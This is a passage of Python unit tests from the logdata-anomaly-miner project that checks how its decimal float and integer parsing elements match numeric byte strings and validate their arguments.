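        self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode())
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, True)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, None)
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, [])
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)})
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, set())
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, ())
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element)


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/DecimalFloatValueModelElementTest.py000066400000000000000000000655201437606560100324650ustar00rootroot00000000000000
import unittest
from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.MatchElement import MatchElement
from unit.TestBase import TestBase, DummyMatchContext


class DecimalFloatValueModelElementTest(TestBase):
    """Unittests for the DecimalFloatValueModelElement."""

    id_ = "float"
    path = "path"

    def test1get_match_element_default_values(self):
        """Test valid float values with default values of value_sign_type, value_pad_type and exponent_type."""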
decimal_float_value_me = DecimalFloatValueModelElement(
            self.id_, DecimalFloatValueModelElement.SIGN_TYPE_NONE, DecimalFloatValueModelElement.PAD_TYPE_NONE,
            DecimalFloatValueModelElement.EXP_TYPE_NONE)
        data = b"22.25 some string."
        value = b"22.25"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22.25, None)
        data = b"0.25 some string."
        value = b"0.25"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0.25, None)
        data = b"22 some string."
        value = b"22"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None)
        # Only the first fraction is consumed; ".2021 some string." stays unmatched for the next element.
        data = b"22.12.2021 some string."
        value = b"22.12"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22.12, None)
        # A trailing decimal point with no digits is still part of the match.
        data = b"22. some string"
        value = b"22."
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22.0, None)
        data = b"0 some string"
        value = b"0"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None)

    def test2get_match_element_default_values_no_match(self):
        """
        Test not matching values with default values of value_sign_type, value_pad_type and exponent_type.

        With SIGN_TYPE_NONE / PAD_TYPE_NONE / EXP_TYPE_NONE a leading sign, a leading zero pad, leading blanks and a
        bare exponent are rejected. Some inputs here are not full rejections: a comma or an exponent suffix stops
        the match after the leading digits, so "22,25" matches 22 and "1e-5" matches 1 with the rest left unconsumed.
        """
        decimal_float_value_me = DecimalFloatValueModelElement(
            self.id_, DecimalFloatValueModelElement.SIGN_TYPE_NONE, DecimalFloatValueModelElement.PAD_TYPE_NONE,
            DecimalFloatValueModelElement.EXP_TYPE_NONE)
        data = b"+22.25"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)
        data = b"-22.25"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)
        # comma is not a decimal separator: partial match of the integer part only
        data = b"22,25"
        value = b"22"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None)
        data = b".25"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)
        # leading zeros are rejected by PAD_TYPE_NONE
        data = b"025"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)
        data = b"0025"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)
        data = b" 25"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)
        data = b" 25"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)
        # exponent is not parsed with EXP_TYPE_NONE: only the mantissa digits match
        data = b"1e-5"
        value = b"1"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None)
        data = b"e+10"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)
        data = b"1e+0"
        value = b"1"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None)
        data = b"00"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)

    def test3get_match_element_optional_zero_values(self):
        """
        Test valid float values with "optional" or "zero" values of value_sign_type, value_pad_type and exponent_type.

        SIGN_TYPE_OPTIONAL accepts a leading minus, PAD_TYPE_ZERO accepts leading zeros, and EXP_TYPE_OPTIONAL parses an
        "e" exponent when present. The matched bytes keep the padding while the parsed value is the numeric value.
        """
        decimal_float_value_me = DecimalFloatValueModelElement(
            self.id_, DecimalFloatValueModelElement.SIGN_TYPE_OPTIONAL, DecimalFloatValueModelElement.PAD_TYPE_ZERO,
            DecimalFloatValueModelElement.EXP_TYPE_OPTIONAL)
        data = b"22.25 some string."
        value = b"22.25"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22.25, None)
        data = b"-22.25 some string."
        value = b"-22.25"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, -22.25, None)
        data = b"0.25 some string."
        value = b"0.25"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0.25, None)
        data = b"22 some string."
        value = b"22"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None)
        data = b"22.12.2021 some string."
        value = b"22.12"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22.12, None)
        data = b"22. some string"
        value = b"22."
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22.0, None)
        # zero padding is kept in the matched bytes but dropped from the value
        data = b"025 some string"
        value = b"025"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 25, None)
        data = b"0025 some string"
        value = b"0025"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 25, None)
        data = b"0025.22 some string"
        value = b"0025.22"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 25.22, None)
        data = b"1e-5 some string"
        value = b"1e-5"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1e-5, None)
        data = b"1e+0 some string"
        value = b"1e+0"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None)
        data = b"0 some string"
        value = b"0"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None)
        data = b"00 some string"
        value = b"00"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None)

    def test4get_match_element_optional_zero_values_no_match(self):
        """
        Test not matching values with "optional" or "zero" values of value_sign_type, value_pad_type and exponent_type.

        Even with SIGN_TYPE_OPTIONAL an explicit "+" is rejected; leading blanks, a leading decimal point and a bare
        exponent do not match either. "22,25" again matches only the integer part.
        """
        decimal_float_value_me = DecimalFloatValueModelElement(
            self.id_, DecimalFloatValueModelElement.SIGN_TYPE_OPTIONAL, DecimalFloatValueModelElement.PAD_TYPE_ZERO,
            DecimalFloatValueModelElement.EXP_TYPE_OPTIONAL)
        data = b"+22.25"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)
        data = b"22,25"
        value = b"22"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None)
        data = b".25"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)
        data = b" 25"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)
        data = b" 25"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)
        data = b"e+10"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)

    def test5get_match_element_mandatory_blank_values(self):
        """
        Test valid float values with "mandatory" or "blank" values of value_sign_type, value_pad_type and exponent_type.

        SIGN_TYPE_MANDATORY requires a leading "+" or "-", PAD_TYPE_BLANK allows blanks between the sign and the
        digits, and EXP_TYPE_MANDATORY requires an "e" exponent, so "+22.25" without exponent does not match.
        """
        decimal_float_value_me = DecimalFloatValueModelElement(
            self.id_, DecimalFloatValueModelElement.SIGN_TYPE_MANDATORY, DecimalFloatValueModelElement.PAD_TYPE_BLANK,
            DecimalFloatValueModelElement.EXP_TYPE_MANDATORY)
        data = b"+22.25e-5 some string."
        value = b"+22.25e-5"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0.0002225, None)
        data = b"-22.25e+5 some string."
        value = b"-22.25e+5"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, -2225000, None)
        data = b"+0.25e+1 some string."
        value = b"+0.25e+1"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 2.5, None)
        data = b"+22e-3 some string."
        value = b"+22e-3"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0.022, None)
        data = b"+22e-5. some string"
        value = b"+22e-5"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0.000220, None)
        # blank padding between sign and digits is part of the matched bytes
        data = b"+ 25e+1 some string"
        value = b"+ 25e+1"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 250, None)
        data = b"- 25e-17 some string"
        value = b"- 25e-17"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, -25e-17, None)
        # no exponent although EXP_TYPE_MANDATORY: no match at all
        data = b"+22.25"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)
        data = b"+1e-5 some string"
        value = b"+1e-5"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1e-5, None)
        data = b"+1e+0 some string"
        value = b"+1e+0"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None)
        data = b"+ 1e+0 some string"
        value = b"+ 1e+0"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 1, None)
        data = b"+0e-3 some string"
        value = b"+0e-3"
        match_context = DummyMatchContext(data)
        match_element = decimal_float_value_me.get_match_element(self.path, match_context)
self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None) def test6get_match_element_mandatory_blank_values_no_match(self): """Test not matching values with default values of value_sign_type, value_pad_type and exponent_type.""" decimal_float_value_me = DecimalFloatValueModelElement( self.id_, DecimalFloatValueModelElement.SIGN_TYPE_MANDATORY, DecimalFloatValueModelElement.PAD_TYPE_BLANK, DecimalFloatValueModelElement.EXP_TYPE_OPTIONAL) data = b"22.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"+ 22.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"- 22.25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"+22,25" value = b"+22" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 22, None) data = b"22,25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"22.12.2021 some string." 
match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b".25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" +25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b" -25" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"025" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"0025" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"e+10" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"00" match_context = DummyMatchContext(data) match_element = decimal_float_value_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test7element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, DecimalFloatValueModelElement, "") # empty element_id self.assertRaises(TypeError, DecimalFloatValueModelElement, None) # None element_id self.assertRaises(TypeError, DecimalFloatValueModelElement, b"path") # bytes element_id is not allowed self.assertRaises(TypeError, 
DecimalFloatValueModelElement, True) # bool element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, 123) # integer element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, 123.22) # float element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, {"id": "path"}) # dict element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, ["path"]) # list element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, []) # empty list element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, ()) # empty tuple element_id is not allowed self.assertRaises(TypeError, DecimalFloatValueModelElement, set()) # empty set element_id is not allowed def test8value_sign_type_input_validation(self): """Check if value_sign_type is validated.""" DecimalFloatValueModelElement(self.id_, value_sign_type="none") DecimalFloatValueModelElement(self.id_, value_sign_type="optional") DecimalFloatValueModelElement(self.id_, value_sign_type="mandatory") self.assertRaises(ValueError, DecimalFloatValueModelElement, self.id_, value_sign_type="None") self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=None) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=b"none") self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=True) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=123) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=123.22) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type={"value_sign_type": "none"}) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=["none"]) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=[]) self.assertRaises(TypeError, 
DecimalFloatValueModelElement, self.id_, value_sign_type=()) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_sign_type=set()) def test9value_pad_type_input_validation(self): """Check if value_pad_type is validated.""" DecimalFloatValueModelElement(self.id_, value_pad_type="none") DecimalFloatValueModelElement(self.id_, value_pad_type="zero") DecimalFloatValueModelElement(self.id_, value_pad_type="blank") self.assertRaises(ValueError, DecimalFloatValueModelElement, self.id_, value_pad_type="None") self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=None) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=b"none") self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=True) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=123) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=123.22) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type={"value_sign_type": "none"}) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=["none"]) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=[]) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=()) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, value_pad_type=set()) def test10exponent_type_input_validation(self): """Check if exponent_type is validated.""" DecimalFloatValueModelElement(self.id_, exponent_type="none") DecimalFloatValueModelElement(self.id_, exponent_type="optional") DecimalFloatValueModelElement(self.id_, exponent_type="mandatory") self.assertRaises(ValueError, DecimalFloatValueModelElement, self.id_, exponent_type="None") self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=None) self.assertRaises(TypeError, DecimalFloatValueModelElement, 
self.id_, exponent_type=b"none") self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=True) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=123) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=123.22) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type={"value_sign_type": "none"}) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=["none"]) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=[]) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=()) self.assertRaises(TypeError, DecimalFloatValueModelElement, self.id_, exponent_type=set()) def test11get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = DecimalFloatValueModelElement(self.id_) data = b"123.22" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(self.path, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) 
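        self.assertRaises(AttributeError, model_element.get_match_element, self.path, set())
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, ())
        self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element)


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/DecimalIntegerValueModelElementTest.py000066400000000000000000000631661437606560100330210ustar00rootroot00000000000000
import unittest
from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
from aminer.parsing.MatchContext import MatchContext
from aminer.parsing.MatchElement import MatchElement
from unit.TestBase import TestBase, DummyMatchContext


class DecimalIntegerValueModelElementTest(TestBase):
    """Unittests for the DecimalIntegerValueModelElement.

    Each get_match_element test builds one model element with a fixed sign/pad configuration and then feeds it a series
    of byte strings; `_assert_match` and `_assert_no_match` hold the parse-and-compare sequence shared by all cases.
    Note that the test numbering jumps from test7 to test9 - there is no test8 in this class; the names are kept so that
    existing test selections keep working.
    """

    id_ = "integer"
    path = "path"

    def _assert_match(self, model_element, data, value, expected):
        """Run model_element over data and check that it produces the expected match.

        :param model_element: the DecimalIntegerValueModelElement under test.
        :param data: raw bytes handed to the parser.
        :param value: the bytes the match is expected to consume.
        :param expected: the integer value the match is expected to carry.
        """
        match_context = DummyMatchContext(data)
        match_element = model_element.get_match_element(self.path, match_context)
        self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, expected, None)

    def _assert_no_match(self, model_element, data):
        """Run model_element over data and check that nothing is matched.

        :param model_element: the DecimalIntegerValueModelElement under test.
        :param data: raw bytes handed to the parser.
        """
        match_context = DummyMatchContext(data)
        match_element = model_element.get_match_element(self.path, match_context)
        self.compare_no_match_results(data, match_element, match_context)

    def test1get_match_element_default_values(self):
        """Test valid integer values with default values of value_sign_type and value_pad_type."""
        decimal_integer_value_me = DecimalIntegerValueModelElement(
            self.id_, DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE)
        # Only the leading digits are consumed; a decimal point or any other byte ends the integer.
        self._assert_match(decimal_integer_value_me, b"22.25 some string.", b"22", 22)
        self._assert_match(decimal_integer_value_me, b"0.25 some string.", b"0", 0)
        self._assert_match(decimal_integer_value_me, b"22 some string.", b"22", 22)
        self._assert_match(decimal_integer_value_me, b"22.12.2021 some string.", b"22", 22)
        self._assert_match(decimal_integer_value_me, b"22. some string", b"22", 22)
        self._assert_match(decimal_integer_value_me, b"0 some string", b"0", 0)

    def test2get_match_element_default_values_no_match(self):
        """Test not matching values with default values of value_sign_type and value_pad_type."""
        decimal_integer_value_me = DecimalIntegerValueModelElement(
            self.id_, DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE)
        # Signs are rejected because SIGN_TYPE_NONE is set.
        self._assert_no_match(decimal_integer_value_me, b"+22.25")
        self._assert_no_match(decimal_integer_value_me, b"-22.25")
        self._assert_match(decimal_integer_value_me, b"22,25", b"22", 22)
        self._assert_no_match(decimal_integer_value_me, b".25")
        # Leading zeros are rejected because PAD_TYPE_NONE is set.
        self._assert_no_match(decimal_integer_value_me, b"025")
        self._assert_no_match(decimal_integer_value_me, b"0025")
        self._assert_no_match(decimal_integer_value_me, b" 25")
        # NOTE(review): this case appears twice in the archive dump; the second entry may originally have differed only in
        # whitespace - confirm against the repository source.
        self._assert_no_match(decimal_integer_value_me, b" 25")
        # An exponent is not part of an integer, so only the mantissa digits match.
        self._assert_match(decimal_integer_value_me, b"1e-5", b"1", 1)
        self._assert_no_match(decimal_integer_value_me, b"e+10")
        self._assert_match(decimal_integer_value_me, b"1e+0", b"1", 1)
        self._assert_no_match(decimal_integer_value_me, b"00")
        self._assert_no_match(decimal_integer_value_me, b"no number 22 some string.")

    def test3get_match_element_optional_zero_values(self):
        """Test valid integer values with "optional" or "zero" values of value_sign_type and value_pad_type."""
        decimal_integer_value_me = DecimalIntegerValueModelElement(
            self.id_, DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL, DecimalIntegerValueModelElement.PAD_TYPE_ZERO)
        self._assert_match(decimal_integer_value_me, b"22.25 some string.", b"22", 22)
        self._assert_match(decimal_integer_value_me, b"-22.25 some string.", b"-22", -22)
        self._assert_match(decimal_integer_value_me, b"0.25 some string.", b"0", 0)
        self._assert_match(decimal_integer_value_me, b"22 some string.", b"22", 22)
        self._assert_match(decimal_integer_value_me, b"22.12.2021 some string.", b"22", 22)
        self._assert_match(decimal_integer_value_me, b"22. some string", b"22", 22)
        # Leading zeros are consumed but do not change the numeric value.
        self._assert_match(decimal_integer_value_me, b"025 some string", b"025", 25)
        self._assert_match(decimal_integer_value_me, b"0025 some string", b"0025", 25)
        self._assert_match(decimal_integer_value_me, b"0025.22 some string", b"0025", 25)
        self._assert_match(decimal_integer_value_me, b"1e-5 some string", b"1", 1)
        self._assert_match(decimal_integer_value_me, b"1e+0 some string", b"1", 1)
        self._assert_match(decimal_integer_value_me, b"0 some string", b"0", 0)
        self._assert_match(decimal_integer_value_me, b"00 some string", b"00", 0)

    def test4get_match_element_optional_zero_values_no_match(self):
        """Test not matching values with "optional" or "zero" values of value_sign_type and value_pad_type."""
        decimal_integer_value_me = DecimalIntegerValueModelElement(
            self.id_, DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL, DecimalIntegerValueModelElement.PAD_TYPE_ZERO)
        # NOTE(review): a leading "+" is rejected here although the sign is optional; confirm this is the intended contract.
        self._assert_no_match(decimal_integer_value_me, b"+22.25")
        self._assert_match(decimal_integer_value_me, b"22,25", b"22", 22)
        self._assert_no_match(decimal_integer_value_me, b".25")
        self._assert_no_match(decimal_integer_value_me, b" 25")
        # NOTE(review): this case appears twice in the archive dump; the second entry may originally have differed only in
        # whitespace - confirm against the repository source.
        self._assert_no_match(decimal_integer_value_me, b" 25")
        self._assert_no_match(decimal_integer_value_me, b"e+10")
        self._assert_no_match(decimal_integer_value_me, b"no number 22 some string.")

    def test5get_match_element_mandatory_blank_values(self):
        """Test valid integer values with "mandatory" or "blank" values of value_sign_type and value_pad_type."""
        decimal_integer_value_me = DecimalIntegerValueModelElement(
            self.id_, DecimalIntegerValueModelElement.SIGN_TYPE_MANDATORY, DecimalIntegerValueModelElement.PAD_TYPE_BLANK)
        self._assert_match(decimal_integer_value_me, b"+22.25 some string.", b"+22", 22)
        self._assert_match(decimal_integer_value_me, b"-22.25 some string.", b"-22", -22)
        self._assert_match(decimal_integer_value_me, b"+0.25 some string.", b"+0", 0)
        self._assert_match(decimal_integer_value_me, b"+22 some string.", b"+22", 22)
        self._assert_match(decimal_integer_value_me, b"+22. some string", b"+22", 22)
        # PAD_TYPE_BLANK allows a blank between the sign and the digits.
        self._assert_match(decimal_integer_value_me, b"+ 25 some string", b"+ 25", 25)
        self._assert_match(decimal_integer_value_me, b"- 25 some string", b"- 25", -25)
        self._assert_match(decimal_integer_value_me, b"+1e-5 some string", b"+1", 1)
        self._assert_match(decimal_integer_value_me, b"+1e+0 some string", b"+1", 1)
        self._assert_match(decimal_integer_value_me, b"+ 1e+0 some string", b"+ 1", 1)
        self._assert_match(decimal_integer_value_me, b"+0 some string", b"+0", 0)

    def test6get_match_element_mandatory_blank_values_no_match(self):
        """Test not matching values with "mandatory" or "blank" values of value_sign_type and value_pad_type."""
        decimal_integer_value_me = DecimalIntegerValueModelElement(
            self.id_, DecimalIntegerValueModelElement.SIGN_TYPE_MANDATORY, DecimalIntegerValueModelElement.PAD_TYPE_BLANK)
        # A missing sign is rejected because SIGN_TYPE_MANDATORY is set.
        self._assert_no_match(decimal_integer_value_me, b"22.25")
        self._assert_no_match(decimal_integer_value_me, b"+ 22.25")
        self._assert_no_match(decimal_integer_value_me, b"- 22.25")
        self._assert_match(decimal_integer_value_me, b"+22,25", b"+22", 22)
        self._assert_no_match(decimal_integer_value_me, b"22,25")
        self._assert_no_match(decimal_integer_value_me, b"22.12.2021 some string.")
        self._assert_no_match(decimal_integer_value_me, b".25")
        self._assert_no_match(decimal_integer_value_me, b" +25")
        self._assert_no_match(decimal_integer_value_me, b" -25")
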